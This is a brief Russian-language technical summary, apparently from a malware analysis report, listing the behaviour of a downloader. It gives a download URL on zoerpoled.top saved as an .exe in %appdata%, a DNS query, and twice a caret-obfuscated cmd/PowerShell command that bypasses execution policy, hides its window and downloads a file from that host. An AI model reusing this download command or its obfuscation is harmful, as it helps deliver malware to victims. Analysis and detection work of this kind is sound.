Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^We^rSHELl.^e^xe^ ^-^exeC^UTI^On^pO^LI^cY bY^p^Ass -NoProFIle ^-WiNDOw^Styl^e HIdde^n ^(nE^w^-^o^bJeCt SYS^TeM.n^ET^.w^eB^Cl^IeNt^)^.do^Wn^lO^a^Dfil^E^('http://www.zoerpoled...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pO^We^rSHELl.^e^xe^ ^-^exeC^UTI^On^pO^LI^cY bY^p^Ass -NoProFIle ^-WiNDOw^Styl^e HIdde^n ^(nE^w^-^o^bJeCt SYS^TeM.n^ET^.w^eB^Cl^IeNt^)^.do^Wn^lO^a^Dfil^E^('http://www.zoerpoled...' (со скрытым окном)